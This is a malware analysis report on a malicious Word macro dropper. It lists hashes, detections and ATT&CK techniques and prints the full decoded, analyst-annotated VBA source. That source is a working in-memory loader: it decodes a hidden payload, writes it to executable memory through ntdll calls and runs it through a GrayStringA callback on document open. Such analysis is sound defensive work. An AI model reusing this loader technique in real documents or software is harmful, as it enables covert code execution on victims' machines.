Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9b925854b37b5f30…

MALICIOUS

Office (OLE)

175.0 KB Created: 2017-02-23 12:26:00 Authoring application: Microsoft Office Word First seen: 2017-03-15
MD5: 92cd7ee9d6f9a6009cde1f322d0f5cec SHA-1: 3f8e78f71aae28d633b2309ff21378cc47f7285f SHA-256: 9b925854b37b5f305327147e54198e44859c21dd57a8f4ac93b882d43fec01e7
90 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The critical ClamAV heuristic and the presence of VBA macros indicate a malicious dropper. The Document_Open macro is a common technique for running malicious code as soon as the document is opened. Although the VBA script is heavily obfuscated, its structure suggests it attempts to download and execute a second-stage payload; the extracted URLs are XMP/RDF metadata namespace identifiers found in the document body rather than command-and-control endpoints.

Heuristics 4

  • ClamAV: Doc.Dropper.ZwMacros-6057750-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.ZwMacros-6057750-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Function
    Private Sub Document_Open()
    Dim phryne As Integer
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL — Channel
    • http://ns.adobe.com/xap/1.0/ — In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# — In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ — In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# — In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13507 bytes
SHA-256: 292a3081777ffb38ad4874b0aa08e70da58f8154da9255f9afebb325b3458a6f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module "ThisDocument" (the Word document class module). It holds the auto-run entry point
' Document_Open and the loader routine shindig; the helpers hewers and fingerspelling wrap the
' native-API declares that live in module "slander" further down in this extract.
' shindig: loader driver, called from Document_Open.
' Flow visible in this routine: read an encoded string from the selected item of the form
' control petrous.behaviorist, decode it with slander.sapling, hand the result to
' fingerspelling (which returns a memory address), then call adj (declared as User32
' GrayStringA) with that address plus a fixed offset in the callback-parameter position.
' The NPer/SYD calls and the string concatenations assign variables that are never read
' again in the extract and look like filler.
Sub shindig()
Dim iodination As Byte
Dim collinsonia As String
' Page count of the document; only used to set the control's Value below.
broad = ThisDocument.ComputeStatistics(wdStatisticPages)
petrous.behaviorist.Value = broad + 9
vitiation = "ch" & "essm" & "an"
organizationally = "ac" & "cepted"
' bathrobe is an item of the control on form/module "petrous" (its exact type is not
' visible here; .SelectedItem suggests a list-style control).
Set bathrobe = petrous.behaviorist.SelectedItem
footfault = 9
appliance = 25298
silvex = 187158
' Filler: financial function whose result is never used.
tetrasaccharide = NPer(75 / 678, footfault, -34342, silvex, 0)

' The encoded payload is carried in the item's Name: the last 5844 characters are taken
' (5844 = 4 * 1461, i.e. whole base64 quartets) and decoded by slander.sapling.
caporal = bathrobe.Name
verdure = 5844
seagreen = Right(caporal, verdure)
porthole = slander.sapling(seagreen)
lolly = 3
shenanigan = 196
stercorariidae = 14329
patzer = 257898
' Filler: depreciation function whose result is never used.
patzer = SYD(patzer, stercorariidae, shenanigan, lolly)

vapor = "fr" & "ench" & "horn"
ashore = "departing"
' Pointer-sized locals for the memory address (annum) and the callback address (vivify).
#If Win64 Then
Dim ataxia As Variant
Dim annum As LongPtr
Dim vivify As LongPtr
Dim chimes As Variant
#Else
Dim planetstruck As Integer
Dim vivify As Long
Dim dolmas As Integer
Dim annum As Long
#End If
chiasmus = 0
blague = "luniform"
noli = 4096
gekkonidae = 5
barkantine = 216
indefective = 25683
wearer = 230264
' Filler: result never used.
wearer = SYD(wearer, indefective, barkantine, gekkonidae)

earthshaking = "ex" & "acti" & "on"
deprivation = "asia"
basidiomycete = "aer" & "ifict" & "ion"
important = "arescent"
amulet = 6
chirpiness = 352
hydrilla = 33193
discursory = 238962
' Filler: result never used.
discursory = SYD(discursory, hydrilla, chirpiness, amulet)

' fingerspelling allocates memory, copies the decoded bytes into it and returns the
' region's base address (see that function).
boniness = porthole
purgatorial = "carbuncled"
botanomancy = "outset"
annum = fingerspelling(boniness)
plethodontidae = "anapsid"
scatter = "bugbane"
' charabancs is the entry-point offset added to the region base:
' 46 + 26 + 1240 = 1312 on 64-bit, (12 + 483) + 2659 = 3154 on 32-bit.
#If Win64 Then
Dim akimbo As Variant
Dim dodge As LongPtr
avibus = "quartet"
embalm = "pensiveness"
Dim shamefulness As LongPtr
charabancs = 46 + 26 + 1240
#Else
involuntarily = "th" & "amnophilus"
capitular = "bearish"
exteriority = "omitted"
Dim dodge As Long
fellows = 12 + 483
Dim shamefulness As Long
charabancs = fellows + 2659

#End If
Dim causatives As String
Dim cerous As Long
' dodge = 0, shamefulness = 1 (split arithmetic hides the constants).
dodge = 40 - 37 - 3
vivify = annum + charabancs
shamefulness = 22 - 29 + 112 - 104
' adj is declared as User32 GrayStringA. Its third parameter is the output callback
' (lpOutputFunc), so passing vivify there makes the API transfer control to the bytes that
' were written into the allocated region. Detection note: a VBA Declare of GrayStringA
' combined with NtAllocateVirtualMemory/NtWriteVirtualMemory is a strong indicator of
' in-memory payload execution; no download or URL call is visible in the extract.
tombe = adj(shamefulness, shamefulness, vivify, dodge, shamefulness, dodge, dodge, dodge, dodge)
adrenocortical = 98
infinity = 2721
dolmen = 318979
' Filler: result never used.
perfective = NPer(84 / 716, adrenocortical, -22874, dolmen, 0)

End Sub

' IterateOpenForms: not referenced anywhere in the extracted source. It uses the Form/Forms
' objects (Access object model, not Word) and looks like pasted sample code kept as filler
' to make the module appear benign — treat as decoy, not as part of the loader.
Sub IterateOpenForms()
    Dim frm As Form
    
    For Each frm In Forms
        'Print the name of the referenced form to the Immediate window
        Debug.Print frm.Name
    Next frm
End Sub

' hewers: thin wrapper around nigroporus, which module "slander" declares as
' ntdll NtWriteVirtualMemory. Argument mapping:
'   adorned    -> destination address (BaseAddress)
'   abutilon   -> source buffer
'   ammotragus -> number of bytes to copy
' The process handle is calced = 30 + 102 - 16 - 117 = -1 (the current-process pseudo handle),
' and cauterization receives the bytes-written output. No return value is assigned, so the
' function returns Empty; the NPer call and the remaining assignments are filler.
Function hewers(adorned, abutilon, ammotragus)
#If Win64 Then
Dim euphemistically As Integer
Dim palinode As Integer
Dim calced As LongPtr
Dim benzoate As LongPtr
Dim cauterization As LongPtr
Dim autopilot As Integer
Dim acrefoot As LongPtr
Dim breakage As LongPtr
#Else
Dim benzoate As Long
Dim differentiation As Variant
Dim calced As Long
Dim sent As Integer
Dim acrefoot As Long
Dim compense As Long
Dim cauterization As Long
Dim stoneware As Integer
Dim breakage As Long
Dim meagerness As Byte
Dim carapace As Byte
#End If
' Filler: self-assignment and an unused Fix().
wonderfully = wonderfully
nakedwood = Fix(51)
benzoate = adorned
breakage = ammotragus
wonderfully = "intransmutable"
acrefoot = abutilon
propoxyphene = 84
entete = 31605
uraninite = 229852
' Filler: result never used.
dryopteris = NPer(70 / 745, propoxyphene, -8766, uraninite, 1)

sm = asepsis + 469
' -1 = current process.
calced = 30 + 102 - 16 - 117
' NtWriteVirtualMemory(-1, adorned, abutilon, ammotragus, &cauterization)
nigroporus ByVal calced, benzoate, acrefoot, breakage, cauterization
sm = Fix(196)
End Function
' Document_Open: Word auto-execute entry point, run as soon as the document is opened with
' macros enabled (ATT&CK T1059.005). The only effective statement is the call to shindig;
' the string concatenations and the SYD call assign variables that are never read.
Private Sub Document_Open()
Dim phryne As Integer
Dim forepart As Long
mature = "ela" & "stoplast"
canonized = "dev" & "eloped"
' Start the loader.
shindig
guet = 7
anatolian = 135
busybody = 45279
patronage = 586252
' Filler: result never used.
patronage = SYD(patronage, busybody, anatolian, guet)
End Sub
' fingerspelling(kenya): allocate executable memory in the current process and copy the
' decoded payload into it; returns the region's base address (clamshell).
'   kenya - Variant holding the decoded string returned by slander.sapling.
' Steps visible here:
'   1. hewers(VarPtr(astasia), VarPtr(kenya) + 8, redwood) copies one pointer-sized value
'      (redwood = 8 on 64-bit, 4 on 32-bit) from offset 8 of the Variant into astasia.
'      NOTE(review): offset 8 of a VARIANT is its data union, so astasia should end up
'      holding the pointer to the string data — confirm under a debugger.
'   2. ararat (ntdll NtAllocateVirtualMemory) with ProcessHandle = -1, BaseAddress = 0,
'      ZeroBits = 0, RegionSize = 9454, AllocationType = 4096 (MEM_COMMIT),
'      Protect = 64 (PAGE_EXECUTE_READWRITE).
'   3. hewers(clamshell, astasia, 4384) copies 4384 bytes from that pointer into the region.
' The Rnd/SYD calls and unused Dims are filler.
Function fingerspelling(kenya)
Dim bryopsida As Integer
Dim goddaughter As Byte
Dim famous As Byte
Dim adroitly As String
' redwood = pointer width: 18 - 92 - 87 + 169 = 8 on Win64, 75 + 101 - 172 = 4 otherwise.
#If Win64 > 0 Then
Dim blandae As Integer
Dim astasia As LongPtr
redwood = 18 - 92 - 87 + 169
Dim clamshell As LongPtr
Dim betterment As Variant
Dim recognizable As Long
Dim protective As LongPtr
Dim corgi As Long
#Else
Dim supposed As Integer
Dim astasia As Long
redwood = 75 + 101 - 172
Dim clamshell As Long
Dim goner As String
Dim protective As Long
Dim tangelo As Integer
Dim myrmecophyte As String
#End If
' Read the data pointer out of the Variant argument into astasia (see header note).
seychelles = VarPtr(astasia)
sinkhole = hewers(seychelles, VarPtr(kenya) + 8, redwood)
' NtAllocateVirtualMemory arguments, each hidden behind split arithmetic:
'   achoerodus = -1 (current process), clamshell = 0 (let the kernel pick the base),
'   classical = 0 (ZeroBits), protective = 9454 (RegionSize), blowtorch = 4096 (MEM_COMMIT),
'   gruntle = 64 (PAGE_EXECUTE_READWRITE).
achoerodus = -1
clamshell = 5 - 7 - 120 + 122
classical = 77 - 36 + 85 - 126
protective = 109 + 9345
blowtorch = 5 - 99 + 4190
gruntle = 64
dichroism = ararat(ByVal achoerodus, clamshell, ByVal classical, protective, ByVal blowtorch, ByVal gruntle)
choleric = fibula

' Filler: random number never used.
sm = Rnd(436)

' Copy 128 + 4256 = 4384 bytes of payload into the new RWX region.
hewers clamshell, astasia, 128 + 4256
fibrocartilage = 3
powdery = 263
pie = 51249
capricorn = 109475
' Filler: result never used.
capricorn = SYD(capricorn, pie, powdery, fibrocartilage)

' Return the region base; shindig adds a fixed offset and passes it as a callback.
fingerspelling = clamshell
End Function

Attribute VB_Name = "slander"
' Module "slander": native-API Declare statements (64-bit and 32-bit variants) plus the
' decoder. The song-lyric comments between the declares are padding. Of the declared APIs
' only adj (GrayStringA), nigroporus (NtWriteVirtualMemory) and ararat
' (NtAllocateVirtualMemory) are referenced elsewhere in the extracted source; the
' remaining declares (ReadConsoleW, SHChangeNotification_Lock, SHGetDesktopFolder,
' SHGetSettings, PathFileExists) are never called and appear to be decoys.
' Detection note: the ntdll library name is written with trailing spaces ("Ntdll.dll  "),
' so exact-string signatures on the Lib name should tolerate whitespace.
'  Maybe if the stars align, maybe if our worlds collide
'  I miss you so much, I miss you so much
#If Win64 Then
'  He was a dreamer at heart
'
' Unreferenced decoy declare.
Public Declare PtrSafe Function boarder Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal excessive As LongPtr,attune As LongPtr,durmast As LongPtr,secretiveness As LongPtr,twoway As LongPtr) As Boolean
'  Chasing after danger, making my heart race, woah
'  He was a dreamer at heart
' Unreferenced decoy declare.
Public Declare PtrSafe Function arctiid Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (fancier As LongPtr, humid As Any,leucine As LongPtr, intercommunion As Any) As Boolean
'
'  Maybe on the dark side we can be together, be together
' Used by shindig: GrayStringA's third parameter is a callback, which is how control is
' transferred into the written memory.
Public  Declare PtrSafe Function adj Lib "User32.dll" Alias "GrayStringA" ( ByVal adnate As Any, ByVal selfopinioned As Any, ByVal unwaxed As Any, ByVal needlework As Any, ByVal backstairs As Any, ByVal fore As Any, ByVal oast As Any, ByVal everything As Any, ByVal starry As Any) As Long
'  Baby I'm yours, baby I'm yours
'  Maybe in a million miles, on a highway through the skies
' Unreferenced decoy declare.
Public Declare PtrSafe Function buchloe Lib "Shell32.dll" Alias "SHGetDesktopFolder" (sarum As LongPtr)
'  He was a dreamer at heart
'  I miss you so much, I miss you so much
' Unreferenced decoy declare.
Public Declare PtrSafe Function dioxide Lib "Shell32.dll" Alias "SHGetSettings" (aye As LongPtr,dekaliter As LongPtr) As LongPtr
'  He was a dreamer at heart
'  I miss you so much, I miss you so much
' Unreferenced decoy declare.
Public Declare PtrSafe Function agastache Lib "Shlwapi.dll" Alias "PathFileExists" (freelance As LongPtr) As LongPtr
'  He was a dreamer at heart
'  I miss you so much, I miss you so much
' Used by hewers: NtWriteVirtualMemory(ProcessHandle, BaseAddress, Buffer, Size, BytesWritten).
Public Declare PtrSafe Function nigroporus Lib "Ntdll.dll  " Alias "NtWriteVirtualMemory" (ByVal sachet As Any, ByVal alstroemeriaceae As Any, ByVal chantey As Any, ByVal excretion As Any, ByVal amorphous As Any) As LongPtr
'  He was a dreamer at heart
'  I miss you so much, I miss you so much
' Used by fingerspelling: NtAllocateVirtualMemory(ProcessHandle, &BaseAddress, ZeroBits,
' &RegionSize, AllocationType, Protect). The fourth parameter name has "ByVal" fused into
' it (denaturedByVal), so it is passed by reference as the API expects.
Public Declare PtrSafe Function ararat Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (dinnertime As LongPtr, myxomycota As LongPtr, ByVal angler As LongPtr,denaturedByVal As LongPtr, expensiveness As LongPtr, ByVal womanizer As LongPtr) As LongPtr
'  He was a dreamer at heart
'  I miss you so much, I miss you so much

'  He was a dreamer at heart
'  I miss you so much, I miss you so much
#Else
'  He was a dreamer at heart
'  I miss you so much, I miss you so much
' Unreferenced decoy declare.
Public Declare Function depletion Lib "Shlwapi.dll" Alias "PathFileExists" (tenet As Long) As Long
'
'  Maybe if the stars align, maybe if our worlds collide
' 32-bit NtAllocateVirtualMemory, used by fingerspelling (same fused "ByVal" in the fourth parameter name).
Public Declare Function ararat Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (mossy As Long, resolve As Long, ByVal glossary As Long, delinquentByVal As Long, chaffinch As Long, ByVal meditatively As Long) As Long
'
'
' 32-bit NtWriteVirtualMemory, used by hewers.
Public Declare Function nigroporus Lib "Ntdll.dll  " Alias "NtWriteVirtualMemory" (ByVal cobber As Any, ByVal airpipe As Any, ByVal beethoven As Any, ByVal bullfight As Any, ByVal loupe As Any) As Long
'
'  Maybe on the dark side we can be together, be together
' Unreferenced decoy declare.
Public Declare Function repicolous Lib "Shell32.dll" Alias "SHGetSettings" (acantholysis As Long, seapiece As Long) As Long
'
'  I miss you so much, I miss you so much
' Unreferenced decoy declare.
Public Declare Function clothed Lib "Shell32.dll" Alias "SHGetDesktopFolder" (prandial As Long)
'
'
' Unreferenced decoy declare.
Public Declare Function nuphar Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (confoundedly As Long, chinks As Any, criminologist As Long, adduction As Any) As Boolean
'  I miss you so much, I miss you so much
'  Tell me, is this freedom, baby?
' Unreferenced decoy declare.
Public Declare Function indicated Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal byzantine As Long, sacrilegiousness As Long, astrantia As Long, manumission As Long, uprise As Long) As Boolean
'  Wings spread to the sun
'
' 32-bit GrayStringA, used by shindig as the callback trampoline.
Public Declare Function adj Lib "User32.dll" Alias "GrayStringA" (ByVal acidophil As Any, ByVal pachyrhizus As Any, ByVal viscaceae As Any, ByVal controversy As Any, ByVal argufy As Any, ByVal advantage As Any, ByVal philately As Any, ByVal doting As Any, ByVal piaster As Any) As Long
'  I miss you so much, I miss you so much
'  Love don't come easy at all

'  Chasing the stars, chasing the stars
'
#End If
'
'  Maybe if the stars align, maybe if our worlds collide
' flared: returns the Unicode code point of the first character of secretariat (AscW).
' Not referenced anywhere in the extracted source.
Function flared(secretariat)
flared = AscW(secretariat)
End Function
' wheresel: ordinary Word Selection code (step left one character when the selection sits
' on an end-of-row marker). Not referenced anywhere in the extracted source; looks like
' pasted sample code kept as filler.
Sub wheresel()
    If Selection.Information(wdAtEndOfRowMarker) = True Then _
        Selection.MoveLeft Unit:=wdCharacter, Count:=1
End Sub

' wuther: arithmetic dispatcher used by the decoder sapling to hide which operator is
' applied. arm selects the operation:
'   39 -> integer division (undeclared \ altorilievo)
'   49 -> bitwise And
'   57 -> multiplication
' Any other arm value matches no Case and the function returns Empty.
Function wuther(undeclared, altorilievo, arm)
Select Case arm
Case 39
wuther = undeclared \ altorilievo
Case 49
wuther = undeclared And altorilievo
Case 57
wuther = undeclared * altorilievo
End Select
End Function
' sapling(amusing): decodes the encoded payload string. What the code does:
'   1. Converts the input to a byte array and adds 16 to every even-indexed byte and 15 to
'      every odd-indexed byte (undoing a simple per-character shift of the alphabet).
'   2. Looks each byte up in the table from cyst (the standard base64 alphabet, see cyst)
'      and combines groups of four 6-bit values into a 24-bit number.
'   3. Splits each 24-bit number into three bytes using masks/divisors that are hidden
'      behind split arithmetic (0xFF0000 / 65536, 0xFF00 / 256, 0xFF).
' In other words: a base64 decoder with a pre-shift. The output buffer bowel (6966 bytes)
' is returned as a String; the SYD/NPer calls, unused Dims and the global scribbles
' (fibula, nakedwood, wonderfully) are filler.
Function sapling(amusing) As String
Dim novello() As Byte
Dim acidic As String
Dim indispose(63) As Long
Dim due As Long
Dim bowel(6965) As Byte
Dim unlaureled As String

Dim squareness(63) As Long
Dim fissibility As Byte

Dim autoplastic(63) As Long
fibula = choleric

Dim characteristic As Long
nakedwood = bruit - 270

Dim anergy As Long

Dim abhenry As Long
wonderfully = fibula

Dim touch As Byte

Dim flatware As Integer
Dim canonize As Long
' christmas = 0xFF00 (mask for the middle output byte); pessimal = 4096 = 64^2.
christmas = 65280
pessimal = 7 + 4089
Dim gasconading As Integer

Dim articular As Long

Dim ovary As Integer

halocarpus = 73 + 114 - 70 + 257931
cite = 63
' likes = 65536, rhincodon = 256, assiduously = 255: divisors/mask for the three output bytes.
likes = 75 + 66 + 52 + 65343
bastardized = 85 + 16514987
rhincodon = 84 + 28 + 67 + 77
assiduously = 43 + 84 + 14 + 114
carboloy = 50 + 97 + 3885
' scrambling = 262144 = 64^3; acidify = 0xFF0000; pardon = 64.
scrambling = 70 + 60 + 262014
acidify = 16711680
pardon = 64
Dim legalism As Variant
garcinia = 101 + 108 - 128 - 81
extenuated = 5843
Dim facially() As Byte
Dim demoniac As Variant
' Input string as an ANSI byte array.
facially = VBA.Strings.StrConv(amusing, vbFromUnicode)
Dim acervation As Integer
budorcas = 2
nem = 223
ammoniac = 11441
cheliferous = 553797
' Filler: result never used.
cheliferous = SYD(cheliferous, ammoniac, nem, budorcas)

' Step 1: undo the character shift. northernmost = Sqr(RGB(0, 1, 0)) = Sqr(256) = 16;
' 5844 bytes (indexes 0..5843) are processed.
puppyism = 5843
northernmost = Sqr(RGB(0, 1, 0))
For prismoid = 0 To puppyism
If prismoid Mod 2 = 0 Then
facially(prismoid) = facially(prismoid) + northernmost
Else
facially(prismoid) = facially(prismoid) + northernmost - 1
End If
Next prismoid
disseize = 8
newly = 341
esocidae = 12389
mutter = 521936
' Filler: result never used.
mutter = SYD(mutter, esocidae, newly, disseize)

flatware = 0
goldbricking = 84 - 84
motheaten = 43
' Reverse base64 alphabet (byte value -> 6-bit value).
subclass = cyst
' Pre-multiplied tables: indispose(i) = i * 64, squareness(i) = i * 4096,
' autoplastic(i) = i * 262144 — the place values of the four sextets in a quartet.
For abhenry = 0 To 63
indispose(abhenry) = wuther(abhenry, pardon, 57)
squareness(abhenry) = wuther(abhenry, pessimal, 57)
autoplastic(abhenry) = wuther(abhenry, scrambling, 57)
Next abhenry
imitated = 65
continuing = 14966
dorser = 387811
' Filler: result never used.
abbreviate = NPer(79 / 589, imitated, -20064, dorser, 1)

novello = facially
diffuse = 4
bodybuilding = 6
apios = 357
leafed = 16129
reagan = 305994
' Filler: result never used.
reagan = SYD(reagan, leafed, apios, bodybuilding)

callinectes = 3
nakedwood = Fix(323)

fibula = "monument"

' extenuate = 2; the loop advances characteristic by 4 per iteration (3 below + Next)
' and canonize by 3, i.e. four input characters -> three output bytes.
outspread = callinectes + 1
extenuate = 109 - 107
For characteristic = 0 To puppyism
geotic = novello(characteristic)
counterinsurgency = novello(characteristic + 2)
' due = t[c0]*64^3 + t[c1]*64^2 + t[c2]*64 + t[c3]
due = autoplastic(subclass(geotic)) _
 + squareness(subclass(novello(characteristic + 1))) + indispose(subclass(counterinsurgency)) + subclass(novello(characteristic + callinectes))
' bowel(k)   = (due And 0xFF0000) \ 65536
' bowel(k+1) = (due And 0xFF00)   \ 256
' bowel(k+2) =  due And 0xFF
abhenry = wuther(due, acidify, 49)
bowel(canonize) = wuther(abhenry, likes, 39)
abhenry = wuther(due, christmas, 49)
bowel(canonize + 1) = wuther(abhenry, rhincodon, 39)
bowel(canonize + extenuate) = wuther(due, assiduously, 49)
canonize = canonize + extenuate + 1
characteristic = characteristic + 3
Next
' Byte array returned as a String (raw bytes, no conversion).
sapling = bowel
End Function

' cyst: builds the 256-entry reverse lookup table for the standard base64 alphabet:
'   'A'..'Z' (65..90)  -> 0..25
'   '0'..'9' (48..57)  -> 52..61
'   'a'..'z' (97..122) -> 26..51
'   '/' (47) -> 63, '+' (43) -> 62
' All other entries keep their initial value 0. Returned as a Byte array (Variant).
Function cyst()
Dim mixtura(255) As Byte
' 'A'..'Z' -> 0..25
chelydra = 65
Do
mixtura(chelydra) = chelydra - 65
chelydra = chelydra + 1
Loop Until chelydra = 91
' '0'..'9' -> 52..61
chelydra = 48
Do
mixtura(chelydra) = chelydra + 4
chelydra = chelydra + 1
Loop Until chelydra = 58
' 'a'..'z' -> 26..51
chelydra = 97
Do
mixtura(chelydra) = chelydra - 71
chelydra = chelydra + 1
Loop Until chelydra = 123
' '/' -> 63 and '+' -> 62
mixtura(47) = 63
chelydra = 43
mixtura(chelydra) = 62
cyst = mixtura
End Function


Attribute VB_Name = "petrous"
Attribute VB_Base = "0{251FA6CC-669C-4E05-A4E9-53108C24B81C}{1165EBC0-DA34-44E4-BFA6-C474BC3D9584}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Module "petrous": only its attributes are present in this extract (no code). The VB_Base
' GUID pair suggests a UserForm — confirm from the OLE streams. shindig reads
' petrous.behaviorist.SelectedItem.Name, so the encoded payload appears to be stored in the
' item names of a control on this form rather than in the macro text; the form's stream is
' where the encoded blob should be carved from.